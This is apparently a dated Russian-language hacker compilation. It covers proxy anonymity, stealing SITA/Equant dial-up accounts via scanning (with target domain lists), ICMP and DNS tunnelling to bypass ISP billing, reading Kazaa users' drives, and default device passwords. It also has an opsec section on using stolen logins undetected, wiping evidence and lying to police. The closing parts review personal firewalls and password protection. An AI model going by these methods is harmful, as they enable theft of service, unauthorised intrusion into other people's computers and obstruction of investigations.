Все прокси-серверы разделяют на две группы: это прозрачные (transparent) и непрозрачные (no transparent). В чем же их отличия? Прозрачные прокси-серверы при различного рода запросах покажут ваш реальный IP-адрес, если Вы, конечно, не используете цепочку из нескольких прокси-серверов, желательно непрозрачных. Поэтому, если Вы задумали что-то не совсем хорошее, то советую воспользоваться непрозрачными прокси-серверами. Такие серверы при любых запросах не выдадут Ваш реальный IP-адрес, поэтому для анонимности нужно использовать именно no transparent прокси-серверы, к тому же желательно не один, а несколько. В этом случае Вас практически невозможно будет отследить и вычислить реальный IP-адрес. Для того чтобы настроить свой браузер на работу с прокси-сервером, Вам необходимо в IE выбрать Сервис -> Свойства обозревателя, а после этого, если Вы используете локальную сеть, на закладке "Подключение" выбрать "Настройка сети", где нужно и вписать адрес прокси-сервера и его порт. В случае, когда для доступа в сеть Интернет Вы не используете локальную сеть, то Вам необходимо выбрать нужное соединение и уже в его настройках указать необходимый прокси-сервер. Однако если вам нужно использовать для анонимности целую цепочку прокси-серверов, то тут настройками одного лишь браузера не ограничишься. Для этого написаны специальные программы, которые и осуществляют подключение посредством нескольких прокси-серверов.
Для эффективности работы прокси-серверов используют кэширование. Оно предназначено для ускорения доступа к документам и снижению трафика, проходящего через сеть Интернет. Допустим, Вы скачали какой-то файл. После этого другой человек, подключившись к этому же прокси-серверу, захотел скачать тот же файл, что был затребован Вами ранее, так вот этот человек получит его намного быстрее, нежели Вы, из-за того, что файл был помещен сервером в кэш и при повторном запросе он уже не выкачивался заново, а был взят из кэша прокси-сервера. Именно поэтому сокращается время ожидания клиентом. Хочу предупредить, что не все документы можно кэшировать. Если доступ к документу или страницам Web открывается только после внесения Вами абонентской платы, то в этом случае эти документы содержат теги WWW-Authenticate, Pragma: no-cache, Cache-control: private, Cache-control: no-cache, а также SetCookie.
Если для доступа к определенным документам требуется пройти аутентификацию или же документ, который Вы потребовали, устарел, то в таких случаях прокси-серверы не заносят в кэш такие документы. Для кэширования применяются различные средства. Существует две технологии кэширования: пассивное и активное. Пассивное кэширование (passive caching) заключается в том, что прокси-сервер просто ожидает запрос и лишь после этого
осуществляет поиск нужного документа, а также определяет, нужно ли производить кэширование. Технология активного кэширования (active caching) состоит в следующем. Прокси-сервер в те моменты, когда активность пользователей снижается, пытается предугадать, какие из документов с большей вероятностью будут затребованы, и извлекает их. Для того чтобы ускорить доступ к ресурсам, крупные компании устанавливают сразу несколько прокси-серверов. Для управления кэшированием применяют специальные протоколы, такие как ICP (Internet Cache Protocol) и CARP (Cache Array Routing Protocol). Исходя из вышесказанного можно сделать вывод, что прокси-серверы зачастую облегчают жизнь пользователей, используя кэширование, поэтому Вы сможете сэкономить свое время в сети, а к тому же остаться анонимными при использовании непрозрачных прокси-серверов. Но здесь нужно учитывать тот факт, что при использовании прокси-серверов Вы тратите лишнее время на подключения, поэтому иногда можно и обойтись и не использовать такие серверы.


Sita

Пока я опишу простейший способ добычи SITA. Этот способ основывается на использовании обычных сканеров.
СИТА специализируется на аэроперевозках и это означает что это связано с авиакомпаниями. Для начала нам надо узнать о поиске доменов.
Узнаёте название авиакомпании вашей страны . Для примера берём Исландию. Авиакомпания у них называется islandair. Далее берём концовку доменов для этой страны - Исландия - is, и что же мы получаем ? Мы получаем домен islandair.is
Далее берём любую Whois проограмму. Например Smart Whois и вводим этот домен там. Жмём Enter и получаем диапазон IP этого домена. Если у вас нету такой программы, то это можно сделать и здесь http://www.leader.ru/secure/ в разделе watson. Ну и вот. Сканируем всё это дело обычным сканером и получаем то что нужно. У всех у них анлимы . Днем они на работе, а вечером, те у кого есть дома компьютер, сидят в инете за счёт своей компании. То же самое и для Экванта.
Кстате не забудьте у них кроме ПВЛ-ок искать на диске С (но вполне может быть и на других дисках) файлы с расширением scp (Макрос удалённого доступа) или скрипт. Чаще всего его суют в папу Windows . Но, ещё раз повторяю, он может быть и в "Моих документах" и где угодно. Для телевидения типа CNN, BBS и т.д. уже дело обстоит по другому. Там в доменах окончания на com или net
Роуминг (филиалы) у них разбросаны по всему миру. И поэтому добыча инета вообще простая . Заходите сюда: http://www.1globalplace.ru/ и разбирайтесь ( это совсем несложно). Если разберётесь, то вы обеспечены халявой на всю жизнь.
Вот вам для этого небольшой списочек. Но вникнув в это дело, вы уже сами будете пополнять этот список:

@islandia.is
@islandair.is
@tal.is
@sita.int
@equant.com
@li.is
@rtl.com
@skima.is
@simi.is
@simnet.is
@taeknival.is
@iff.is
@val.is
@in.is
@islandssimi.is
@strik.is
@airiceland.is
@flugflelag
@isnet.is
@binet.is

Ниже представлены рабочие домены грика и экванта, некоторые уже могут быть забанены на сегодня

РОЛ:
@global.gte
@agilent.com
@ShellExternal.com
@Shell-eu.net
@ap.org
@ap.com
@server-access.com
@weatherford.com
@bureauveritas.com
@fiberlink.com
@globaldial.co.uk
@vianetworks.co.uk
@pro-eco.com

ЭКВАНТ:
@ingenici.00.go
@demoty4i.00.go
@esa.int
@Vnet
@ftna.com
@teleglobe.net
@fr.eu.acs
@ahlstrom.com
@eyuk.com
@wuintl.com
@muc.wacker.com
@masemea.alstom.com
@bacardi.gva
@ams1.cisco.com
@EBS-FR
@masemea.alstom.com
@danzas.hk
@secaccess.net
@islandia.in
@atlanta.is
@structuredintelligence.com
@MFA_PPP.GOV.IL

А прочитав внимательно статью про язык скриптов, вы уже сами сможете клепать свои так необходимые всем скрипты с халявным нетом.
Здесь список номеров модемных пулов ситы в разных странах и городах.


ICMP Tunneling

Многие московские провайдеры подвержены взлому через гостевые входы, в результате чего злоумышленник имеет возможность пользоваться услугами провайдера бесплатно. В основном используются технологии ICMP Tunneling, а также RTCP.

За последние два месяца было исследовано несколько московских провайдеров, предоставляющих dialup доступ в интернет и использующие систему оплаты по карточкам. Гостевой вход в идеале дает возможность посетить сайт провайдера для регистрации\пополнения баланса. Реальность как обычно сильно отличается от идеала.

Результаты исследования оказались такими: почти четверть провайдеров выдавала динамический IP-адрес гостю из того же диапазона, что и обычным пользователям (а не локальный адрес), среди которых 50% неправильно настроили фильтрацию трафика от "гостей", и как результат - гость может может обмениваться пакетами специального вида с любым хостом в глобальной сети. Все провайдеры фильтруют исходящие соединения, т.е. TCP SYN (кроме сайта ISP) - что, как им кажется, полностью блокирует доступ на другие сайты. Многие на этом и успокаиваются. Это дает возможность использовать протоколы прикладного уровня как транспортные протоколы или т.н TUNNELING. Основной принцип обхода фильтрации - использование промежуточного хоста в сети, оптимальный вариант - root shell на любом unix-сервере. Попробуем классифицировать способы такого "обхода защиты" по виду используемого транспортного протокола и способу использования промежуточного хоста.

1 способ. ICMP Tunneling. Весьма древний способ, однако против провайдеров применяется видимо впервые. Основывается на предположении, что на уязвимом провайдере проходят in/out icmp пакеты. Обычно IMCP траффик не анализируется и никак не учитывается назко квалифицированными администраторами. Такая ситуация наблюдалась почти на всех провайдерах, поэтому остановимся на таком способе и рассмотрим его подробно.

Схема протокола выглядит так. Программное обеспечение на компьютере пользователя TCP пакеты вкладывает в ICMP пакеты, также туда вкладывается дополнительная тех. информация, используемая на следующих этапах (обработка ошибок, поддержка нескольких TCP соединений, адрес:порт хоста к которому пользовательская программа запросила соединение) и пакет отправляется на промежуточный хост (ПХ). На ПХ устанавливается программа принимающая icmp пакеты от пользователя. Она извлекает их них TCP пакеты, меняет в них source address и отправляет их на указанный хост:порт, если последний отправляет на ПХ данные в ответ, ПХ упаковывает их в ICMP и не меняя поля source address шлет их пользователю.

В результате создается "виртуальное" TCP соединение, причем как пользовательские программы так и удаленный хост считают, что оно установлено обычным образом. Вся коррекция ошибок при передаче данных (если какие-то пакеты будут потеряны) возлагается на ядро ОС пользователя и ОС удаленного хоста. ПХ и клиентская программа никак не участвуют в этом. Поддержка нескольких соединений достигается введением дополнительного поля в транспортный протокол (кроме самих данных) и использованием в программе на ПХ кольцевого буфера с сортировкой.

Достоинства:

Маловероятное обнаружение использования данной схемы самим провайдером.
Коррекция ошибок самим ядром.

Недостатки:

Нестабильность и низкая скорость передачи данных в силу специфики протокола ICMP.
Требуется root shell на ПХ, т.к. нужно перехватывать ICMP пакеты - такая привилегия дается только root.
Увеличивается нагрузка на канал(по сравнению с номинальной) из-за вложения одного пакета в другой. Это приводит к "утяжелению" каждого передаваемого пакета.

Вывод - очень удобная схема для совершения незаконных действий в сети не требующих передачи больших объемов данных.

2 способ. RTCP (Reverse TCP) - включен в данную статью из- за простоты использования и написания. Эта схема является конкурентом предыдущей из-за возможности передавать данные с намного большей скоростью (фактически со скоростью самого канала). Однако данную схему можно использовать всего на двух московских провайдерах из-за очевидного способа использования самой уязвимости - возможность установления входящих соединений на хост пользователя. Такая оплошность со стороны ISP выглядит по меньшей мере странно, однако она имеет место быть, причем у довольно крупных провайдеров.

Принцип действия. На компьютере пользователя работает ПО, которое, используя WinAPI, перехватывает все исходящие соединения и переадресует их на локальный порт(назовем его - A), туда же передаются данные о том куда на самом деле пытался подключиться пользователь (в специальном формате) - т.е. похоже на принцип работы SOCKS5 (и еще более похоже на принцип работы небезызвестной программы SocksCAP). При подключении на порт A, ПО принимает данные о том куда надо подключиться и посылает запрос на ВХОДЯЩЕЕ СОЕДИНЕНИЕ промежуточному хосту и слушает порт B. Запрос может быть любым пакетом (например TCP ACK который проходит почти везде или "многострадальный" ICMP). Главная информация которую он несет - IP отправителя. Получается "связка" двух серверных сокетов.

ПХ подключается на порт B - принимает через него данные о том куда надо подключиться + некоторое количество данных скопившихся в буфере клиента после подключения пользовательского ПО на порт А. ПХ подключается на нужный хост:порт. Цепочка замыкается - устанавливается полноценное TCP-соединение в стиле SOCKS-proxy.

Достоинства:

Полноценное соединение.
Максимальная скорость передачи данных(ограничивается только каналом).
Небольшое количество и полная коррекция ошибок.

Недостатки:

Вполне вероятное обнаружение использования схемы.
Долгий процесс установления соединения.
Небольшое количество уязвимых ISP.

Вывод - удобно, просто, быстро, но опасно. Такая схема представляет угрозу только самому провайдеру, т.к. обнаружить человека, подключившегося фактически через SOCKS-прокси довольно легко (логи и пр.)

И еще некоторое дополнение - на всех провайдерах существует уязвимость такого рода: есть возможность передавать в сеть дискретные исходящие данные делая специальный DNS запрос на DNS-сервер провайдера. Надо поставить на свой шелл поддельный DNS-сервер, зарегистрировать любой домен типа domenshella.com, и выдавать DNS-запросы типа nekaya-informacia.domenshella.com - данные будут приходить на шелл. Уязвимость не очень важная, хотя найти ей пользование вполне возможно.

Остальные способы тоже могут использоваться на многих ISP. Все они используют один и тот же принцип - "игра" с TCP флагами. Например у кого-то проходят TCP SYN RST FIN или что-то в этом роде - соответственно перехватываем пакет, ставим в нем дополнительные флаги RST FIN - и отправляем его дальше на ПХ. Тот в свою очередь убирает эти флаги, меняет source на свой адрес и отправляет куда надо.

Из всего вышеизложенного можно сделать вывод, что большинство московских ISP имеют уязвимости в системах гостевого доступа, что чревато самыми разнообразными, но одинаково негативными последствиями как для самого ISP, так и для других пользователей. Советом администраторам ISP может быть следующее: не следует надеяться на фильтрацию, лучше выдавать гостям локальные адреса, и также следует ограничивать время гостевой сессии 10-ю минутами.


P2P

В последнее время большую популярность получили P2P сети. Но мало кто знает, что без должной защиты - это огромная брешь в системе любого пользователя.
Технология взлома компьютера, на котором запущен P2P клиент очень проста (проверялась на примере Kazaa):
Берем любой сканнер портов, настраиваем его на сканирование любого диапазона на наличие открытого порта 1214 (порт Kazaa, также можно попробовать и другие порты, все зависит от клиента P2P сети). Через несколько минут у тебя будет 10-20 активных IP.
Коннектимся telnet`ом к клиенту и узнаем, что пользователь использует (в нашем случае это Kazaa).
Запускаем Kazaa и далее в строке встроенного браузера набираем <IP жертвы>:1214 и жмем Connect.
Вот и все, скорее всего в результате вы получите диск C: со всем его содержимым.

Если пойти далее, то заменяя заголовок в пакетах на IP жертвы, можно получить доступ ко всему диску.

Кстати, некоторые пользователи P2P сетей настроили свои клиенты так, что доступ к их винту открыт по умолчанию.

Так что юзай.

Ниже скриншот Kazaa:

Козачка


Default Passwords

Ниже приведены пароли по умолчанию в разных системах

routers(AN AHN ARN) - no passwords as default
workgroup switches - login:Manager
manager/manager
security/security
monitor/monitor

default CISCO routers
password: cisco
(works on 20-30% of hosts )

On 3Com products try SuperStack as password

Security Vulnerability in Motorola CableRouters
The CableRouter leaves an open telnet port at port 1024.
Furthermore, the CableRouter performs absolutely NO logging of connections - you can connect and never be seen.
Login: cablecom
Password: router

defaul account for many old unixes:
login: sync
with no password
(can be used with LDPRELOAD exploit)

Default Account for MS SQL Server
Username: sa
with no password

InterBase default account
SYSDBA/MASTERKEY

Novell Netware
default accounts - SUPERVISOR, GUEST,
and Netware 4.x has ADMIN and USER_TEMPLATE as well.
All of these have no password to start with.


Защита

Тут пойдёт обсуждение методов защиты своего компа от кражи ваших паролей, о фаерволах, защиты от ФСБ ;-)


Безопасность

Теперь поговорим о безопасности.

Для начала ПРЕДУПРЕЖДЕНИЕ: НЕ ПОПАДИСЬ !!! Если ты «украл» у человека пароли от инета, то не удаляй, не редактируй важную информацию на компьютере пользователя. Этим ты можешь себя обнаружить. И если у человека пропадет очень важная информация, а ты еще будешь пользоваться его интернетом, то есть возможность того, что он узнает твой номер телефона и тогда у тебя будут огромные проблемы. Так что усвой первое правило - ты в безопасности пока тебя не обнаружили.

Второе правило - чисти логи, у тебя в квартире не должно быть листков, дискет, и другой информации о других пользователях (логины, пароли, счета, номера кредиток). Всю информацию либо запоминай, либо не используй, так как из-за одной такой бумажки тебе могут дать срок. Про АнтиАОН знают все, но он не у всех работает, так что это проблема каждого, кто использует халявный инет. Статей на эту тему много, так что представляю вам возможность разобраться с этим самим. Повторяю - это необходимость для каждого хакера использующего халявный инет.

При проверке состояния счета лучше всего заходить через proxy, так безопаснее. И не бросайтесь использовать интернет сразу же. Так как если вы измените пароль, чтобы получить полный контроль над аккаунтом пользователя, то его могут восстановить, и когда он в логах увидит ваш телефон (при отсутствии АнтиАОНа) вам не поздоровиться. Так что каждый логин выставляйте в «отстойник» на 7-8 дней, и если после этого срока пароль не изменился, и никаких движений на счету не было, то смело можете его использовать. Однако известны случаи когда после выжидания почти двух недель и использования аккаунта, хозяин аккаунта обращался к провайдеру, и аккаунт закрывали, а номер телефона того кто не законно юзал аккаунт банили.

Для полной безопасности сделайте у себя на винте зашифрованный диск. Используйте программу PGP 8.0 (www.pgpi.com), или лучше BestCrypt 7.08 (www.jetico.com) + дополнительный модуль шифрования blowfish-448. Как создать этот диск читайте Help. Скидывай туда любые файлы, от сканнеров безопасности, до украденных PWL. Устанавливайте пароль минимум 40 символов, также не храните пароли в Windows звонилке (которая и создаёт эти
файлы PWL), так как их можно восстановить, используйте программы для дозвона, которые хранят пароли в себе. Также не давайте пароли своим друзьям, знакомым, родственникам. Ведь если они попадутся, то выйти на вас не составит проблем. Еще после каждого сеанса удаляй информацию о соединениях из реестра, или настрой какую-нибудь программу, чтобы она делала это за тебя:

HKEY_CURRENT_USER>RemoteAccess>Profile - информация о логине соединения, HKEY_CURRENT_USER>NETwork>Recept - информация о подключённых рессурсах в интернет. Это минимальная необходимость.

Также если Вы не хотите быть пойманным, ни вкоем случае не продавайте пароли которые "украли", т.к. человек которому вы продатие может быть подставным, или же просто сообщит провайдеру ваши данные.

Без данных действий даже не пытайтесь использовать халявный интернет.

Также будьте готовы, в один прекрасный день вам могут позвонить, и потребовать деньги за использованный интернет. Во-первых не следует паниковать, во-вторых сразу же удалите все pwl файлы, при помощи утилиты PGPWipe или BCWipe и им подобных, сканнеры, и другие хакерские утилиты. Это даст вам возможность выйти сухим из воды.

Если же к вам пришли менты, то все отрицайте, и заранее заготовьте для них рассказ про то, что пароль дал вам один человек из чата, а вы его "случайно использовали".

А теперь подумайте. Еще раз подумайте, а оно вам надо. Мне кажется проще объяснить родителям, что вам и им грозит, если они пожалеют 15-50$ на интернет. Ведь эта нормальная плата за спокойный сон и безоблачное будущее.


Пароли

Как же обезопасить свой аккаунт от похищения? Есть несколько несложных правил, соблюдая которые можно быть уверенным, что пароли не будут похищены:
Никогда не делать общедоступными целые диски или системные папки, даже только на чтение и под паролем. Все расшареные папки делать доступными только для чтения, если необходимо сделать возможным закачивать файлы на машину, то нужно разрешить полный доступ к отдельной пустой папке, например Incoming.
В Windows 98 никогда не включать удаленное администрирование.
Отключить парольный кэш. Для этого надо найти ключ

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Network и изменить параметр DisablePwdCaching с 0 на 1, если не существует - создать (он имеет тип DWORD или Binary в терминологии Norton Regedit). Все исполняемые файлы и архивы, скачиваемые из интернета, а также все файлы, приходящие по почте проверять на наличие вирусов. Это защитит от всевозможных троянов. Придумывать сложные пароли, содержащие прописные и строчные буквы, цифры, прочие символы, длиной не менее 8 символов. Это сделает невозможным подбор.
Не предоставлять всем подряд физический доступ к компьютеру.


Firewall

Персональных файерволлов на рынке программного обеспечения довольно много, но программы эти в большинстве своем не очень известны, за исключением, пожалуй, уже несколько устаревшего AtGuard.
Выбрать есть из чего, но насколько эффективно вы обезопасите с их помощью свои системы от злоумышленников зависит не только от того, что вы предпочтете, но и от того, как настроите и как будете использовать эту программу.

Sygate Personal Firewall (Sybergen's Secure Desktop)
www.sygate.com

Если вы собираетесь использовать персональный файерволл для значительного коллектива подопечных пользователей, то вам необходима некоторая степень централизованного развертывания и управления. Personal Firewall позволяет это легко осуществлять.

Хакер, решивший проникнуть на машину, снабженную такой программой, не только не обнаружит открытых портов, но и решит, что компьютер просто выключен, благодаря так называемому STEALTH-режиму, при котором неиспользуемые вами порты не откликаются на запросы из Сети. При активном Personal Firewall не удастся получить никакой информации, обычно доступной с подключенного к сети ПК - такой как имя компьютера, пользователя, рабочей группы. Использование его совместно с дополнительным компонентом Sygate Enterprise Network - сетевым центром управления пользовательскими машинами - эффективнейшим образом защитит любую корпоративную среду, позволяя дистанционно управлять всеми ПК в сети предприятия. Так, можно заставить файерволл высылать по электронной почте уведомление администратору об обнаруженном сканировании портов или попытке взлома. При этом ведется детальный протокол всех событий, облегчающий дальнейший "разбор полетов".

Простота панели управления программы не должна вводить вас в заблуждение - вы можете заблокировать любой порт, задавая либо отдельно протокол TCP или UDP, либо оба одновременно. Имеется поддержка и протокола ICMP. Эта обманчиво простая панель настроек позволяет без каких-либо особенных знаний всех тонкостей сетевых коммуникаций задавать пять стандартных конфигураций уровня безопасности. При этом степень Ultra High с точки зрения защиты практически равнозначен выдергиванию штепселя модемного шнура из телефонной розетки при Dial-Up подключении к интернету - и его следует иногда использовать, например, если вы постоянно подключены по выделенной линии. Установка High, тем не менее, дает полный доступ к ресурсам сети через Internet Explorer и Outlook Express при отличных показателях безопасности. Так, например, при попытке использовать другие программы, стремящиеся попасть во внешний мир, Personal Firewall выдаст запрос на включение этих программ в "белый список"
приложений, которым вы доверяете - это так называемый интерактивный режим "обучения" программы. Программы из этого списка будут иметь сетевой доступ независимо от выбора уровня безопасности.

Только не вполне понятно, почему в программе существует понятие разрешенных IP-адресов, и нельзя задавать запрещенные адреса - это серьезное ограничение ее функциональности.

Personal Firewall умеет задавать степень защиты, которая изменяется в зависимости от времени суток, что чрезвычайно важно при постоянном подключении к интернету. Так, администратор может позволить пользователям иметь полноценный доступ в Сеть днем и блокировать все на свете по окончании рабочего дня, защищая систему от несанкционированного доступа в свое отсутствие.

Еще одна необычная особенность файерволла - самостоятельное повышение уровня защиты при активизации скринсейвера, что, правда, может создавать помехи некоторым сетевым программам удаленного администрирования. Диалог конфигурирования Personal Firewall позволяет и вручную регулировать дополнительные настройки портов или выбирать "пресеты" часто встречающихся установок типа "Разрешить обзор сетевого окружения" простой установкой одного флажка. Если вы предпочтете управлять доступом к портам вручную, то сможете не только открыть/закрыть любой порт, но и назначить заданным приложениям разрешенные рабочие порты.

Инсталляция, требующая перезагрузки ПК, проблем не вызывает, файерволл работает и в Windows 2000, однако, обратите внимание на список известных "багов". Так, например, предыдущая версия программы, называвшаяся Sybergen's Secure Desktop, была несовместима с Internet Chess Server. В общем, читайте немногословную, но достаточно грамотную документацию.

Network Ice Black ICE Defender
www.networkice.com

Этот файерволл применяет в своей работе приятную во всех отношениях функцию Black Trace - получение всей возможной информации о "хакающем" вас злоумышленнике. Генерируемый при отслеживании хакера протокол, зафиксировавший в пригодном для предъявления обвинения формате все незаконные действия правонарушителя, пригодится если уж не в суде, то, по крайней мере, будет серьезной уликой в разборках с привлечением интернет- провайдера (или местной братвы). Попавшийся чрезмерно активный "кулхацкер" запросто лишится как минимум выхода в интернет (о максимуме говорить не будем). Идентификация природы неизвестного трафика - очень хорошая функция, но манера Black ICE Defender обозначать любое соединение как атаку может заставить юзера поседеть гораздо раньше времени. В дополнение ко всему, Black ICE Defender при предупреждении (а это делается даже звуковыми сигналами) об обнаруженных попытках вторжения определяет степень опасности произошедшего события - от "критического" до "информационного". При этом файерволл даже слишком многословен, когда ведет протокол событий - регистрируется абсолютно все!

У Black ICE Defender имеется и еще одна уникальная возможность. Путешествуя с мобильным ПК, или при Dial-UP доступе в интернет вы обычно не можете получить статический IP-адрес. Это означает, что нельзя заранее создать безопасное соединение между двумя ПК, задав явным образом их IP- адреса и разрешив им совместный доступ к файлам. Black ICE Defender очень элегантно решает эту проблему. Для этого достаточно (не пугайтесь!) открыть порты NetBIOS и установить нетривиальный пароль на доступ к файлам - если Black ICE Defender обнаружит попытку подобрать пароль, он тут же самостоятельно занесет IP злоумышленника в черный список и разорвет это соединение. Вы же, зная правильный пароль, всегда получите полный доступ, вне зависимости от динамически назначаемого IP-адреса своего рабочего ноутбука.
Настройка совместного доступа к файлам очень проста, что есть немаловажный плюс программы.

К сожалению, хоть Black ICE Defender и блокирует порты весьма эффективно, он не умеет управлять доступом в
Сеть установленных на компьютере приложений - уходящий трафик ничем не защищен. Таким образом, если уж "троянский конь" попал в вашу систему, то ничто не помешает ему воспользоваться открытым (например, для Outlook Express) портом и отправить все ваши пароли куда-нибудь на анонимный почтовый ящик mail.ru.

Еще один недостаток заключается в том, что иногда замечается неожиданное, без каких-либо предупреждений, прекращение работы файерволла. К тому же за это хозяйство разработчики еще хотят ежегодный лицензионный взнос, как будто вы не покупаете программу, а берете ее в аренду.

Black ICE Defender также имеет несколько заранее заданных уровней безопасности, причем названия им выбраны не без юмора: Trusting, Cautions, Nervous и Paranoid. Каждый уровень, хоть и пропускает все исходящие соединения, но обеспечивает чрезвычайно надежную фильтрацию поступающих соединений. При ручном же вводе конкретного IP-адреса в список разрешенных или заблокированных IP, Black ICE Defender либо разрешит полный доступ с этого адреса к вашему ПК, либо полностью заблокирует все приходящие пакеты.
Однако очень неудобно то, что нельзя задавать диапазон IP-адресов или маску подсети. Оригинальное динамическое управление правилами снимает необходимость обучающего режима (отсутствующего в этой программе). Небольшой совет: поскольку IP-адрес, в принципе, можно и "подделать", будет неплохо, если вы сконфигурируете свои маршрутизаторы так, чтобы они не пропускали пакеты, носящие IP-адреса вашей сети, но порожденные за ее пределами.

На системы с Windows NT и Windows 9x программа устанавливается, даже не требуя перезагрузки компьютера, что немного облегчит жизнь "админам" с большим парком обслуживаемой техники. Тщательно продуманная документация охватывает все функции программы и содержит неплохие рекомендации о том, как следует реагировать на засеченные попытки взлома.

Zone Alarm
www.zonelabs.com

В напарники к Black ICE Defender можно посоветовать программу Zone Alarm, компенсирующую его основной недостаток - отсутствие контроля за приложениями, пытающимися выбраться в интернет. Эта бесплатная программа (есть и чуть расширенный платный вариант - Zone Alarm Pro) почти идеальна для индивидуального использования и защитит и одиночных "диалапщиков", и десяток машин в локальной сети небольшой конторы. Помимо того, что утилита работает без проблем на любых версиях Windows - вплоть до Windows 2000 и "Миллениума", она требует всего-навсего 486-й процессор и более чем нетребовательна к объемам оперативной памяти.

Все всплывающие сигнализаторы неопознанной сетевой активности будут понятны самым неопытным пользователям и предлагают всего два выбора - допустить соединение или отказаться от него. Также Zone Alarm спросит, хотите ли вы, чтобы программа запомнила этот ваш выбор на будущее. Для каждой зарегистрированной подобным образом или вручную программы есть возможность впоследствии конкретизировать настройки, указав разрешенные IP и порты. Все без исключения обращения к Сети протоколируются, даже если вы отключите вывод информационных сообщений о детектировании разрешенных соединений.

Разработчики этого файерволла тоже заботятся об удобстве пользователя, позволяя простым перемещением движка-регулятора задавать любой из трех предустановленных уровней защиты, причем отдельно настраиваются две зоны - локальная сеть и интернет. Характеристики этих установок легко изменить, если вас в них что-то не устраивает. При максимальном уровне не произойдет никаких соединений, пока вы лично их не разрешите, что, впрочем, требует некоторого времени на "обучение" программы - так что более чем десятку пользователей не стоит ее устанавливать одновременно, если не хотите стать админом-марафонцем.

Zone Alarm, как и многие другие защитные утилиты, использует STEALTH- режим, который "прячет" все неиспользуемые порты, предотвращая ответы о текущем статусе порта, запрашиваемые, например, при сканировании вашей машины в поисках "дыры". Несмотря на кажущуюся простоту программы, она способна блокировать множество потенциально угрожающих вашей системе пакетов из интернета. При активизации экранной заставки или во время простоя ПК программа может полностью перекрыть выход в интернет, что повышает уровень безопасности забывчивых пользователей, особенно при постоянном подключении к Сети.

Для локальной зоны лучше установить среднюю степень защиты, чтобы сохранить сетевой доступ к "зашаренным" ресурсам - немаловажно, что при этом пользователь сам определяет, что относится к локальной зоне. К счастью, в этом случае не нужно вводить IP-адрес каждого ПК в локальной сети - достаточно задать диапазон адресов или маску.

В последнем релизе Zone Alarm добавилась опция Mail Safe, предотвращающая запуск потенциально опасных скриптов, полученных по электронной почте, типа печально известного вируса I LOVE YOU. В отличие от антивирусных программ, эта функция не даст пользователю запустить новейший, неизвестный антивирусам деструктивный скрипт. Также появилась закладка Privacy, которая отвечает за блокирование нежелательных куи и рекламы. К сожалению, документация к программе ограничена HTML-справкой, но зато написана она довольно прилично. При желании вы сами воплотите ее в материальную форму, распечатав на принтере.

Norton Internet Security 2002 Family Edition
www.symantec.com

После покупки фирмой г-на Питера Нортона Symantec популярнейшей программы AtGuard можно было с полным правом ожидать, что изменится не только название файерволла, но и значительно улучшится его надежность и функциональность. В чем-то эти ожидания оправдались, а в чем-то и нет. Зато теперь программа "весит" около 40 Мб, поскольку в нагрузку к ней дается Norton Antivirus, что, согласитесь, заставляет трижды подумать при выкачивании демонстрационной (да и купленной) версии NIS2002 с сайта Symantec.

Появились аналогичные другим программам «движки», задающие несколько степеней защиты. Кроме того, программа теперь сама умеет автоматически создавать для нескольких наиболее распространенных приложений (Outlook Express, Internet Explorer, CuteFTP и т. д.) необходимые настройки, избавляя юзера от лишних проблем. Набор вариантов настроек существенно расширен, и теперь есть возможность блокировать IGMP-пакеты и фрагментированные IP-пакеты. Ручная конфигурация, естественно, позволяет настраивать программу как угодно, никаких ограничений нет вообще, вот только добраться до нужного меню стало труднее - надо раза четыре нажать кнопку мыши, переходя от одного меню к другому. Да и удобная панель быстрого доступа к настройкам и наглядной индикации событий Dashboard по умолчанию отключена - чтобы ее вызвать, надо вручную создать ярлык C:FilesInternet Security Family Edition.EXE -AppBar, в то время как в инструкции о существовании Dashboard вообще ничего не сказано.

Никаких проблем с "обучением" файерволла новым правилам в процессе детектирования попытки установления нового, незарегистрированного соединения не наблюдается, весь процесс укладывается в два клика во всплывшем диалоговом окне. Появилась шикарная опция - NIS2002 теперь умеет связывать привилегии доступа в интернет с конкретными приложениями. Вы можете, например, разрешить только вашему Internet Explorer соединяться только с ресурсами веб-серверов по портам 80 (http) и 443 (https) - то есть любому трояну уже ничего не светит. Для любой настройки есть даже возможность установить часы работы, чтобы разрешать, например, выход в интернет пользователям локальной сети только в обеденный перерыв. Надежность работы файерволла обеспечивается тем, что пакеты обрабатываются на низком уровне специальным драйвером до их отправки на растерзание какой-либо другой программе.

Уникальнейший режим блокирования баннеров сэкономит вам немало денег и времени, вырезая весь этот мусор из трафика. Помимо этого, вы можете сделать огромное количество других настроек - от блокировки подозрительных и опасных элементов ActiveX, JAVA-скриптов и апплетов - еще одного узкого места в безопасности браузеров, - до запрещения отправки cookies, выдачи версии вашего браузера и адреса электронной почты - анонимность нынче в моде.

Совершенно новая функция - ограничение доступа детей к "взрослым" сайтам - обойти ее, не зная пароля для доступа к настройкам файерволла (или тонкостей настройки самой операционной системы), будет очень непросто. Впрочем, если это вам не нужно, то приобретайте облегченную и удешевленную версию программы под названием Personal Edition. В ней отсутствует родительский контроль, однако в нем удалена еще и возможность блокировать рекламу.

К сожалению, в точности следуя своему названию, Norton Internet Security предназначен для работы исключительно с интернетом и не поддерживает сетевые протоколы NetBEUI, IPX, ARP, так что в локальной сети нет особого смысла его использовать, ибо защита получится несколько однобокая. Хотя для работы в интернете как самое комплексное решение он, пожалуй, идеален.

Учтите только, что в некоторых версиях программы после ее инсталляции оказываются открытыми порты NetBIOS для совместимости с некоторыми старыми кабельными модемами - первым же делом их закройте, если не намерены применять совместный доступ к файлам.

ConSeal PC Firewall
www.signal9.com

Интерфейс этой программы оставляет желать лучшего, но она - один из самых надежных, настраиваемых и гибких файерволлов, приближающийся по качеству к аппаратному брандмауэру, отлично подходящий опытному пользователю. Отсюда проистекает и самый главный его недостаток - пользователь должен отчетливо себе представлять, что такое TCP/IP.

Наборы правил этого файерволла представляют собой обычные файлы, которые без труда размножаются на любом количестве ПК в больших сетях. Настройке поддается все, что нужно: IP-адреса, порты, доступ приложений, направление пакетов. Есть и режим обучения, так как необходимость создания наборов правил вручную может сначала напугать кого угодно. На этот счет разработчики выложили на сайте несколько комплектов уже готовых файлов с вполне исчерпывающими настройками, которые послужат неплохой основой для создания установок, оптимальных в вашей конкретной системе. Учтите только, что когда вы устанавливаете новый файл с набором правил, то старые настройки не уничтожаются, а дополняются новыми, а в случае конфликта двух правил работает то, которое было установлено последним.

Установка проходит довольно гладко, да и инструкция весь процесс неплохо описывает, особо обращая внимание на всяческие хитрые моменты конфигурирования программы. Зато в Windows 2000 программа не работает совсем.

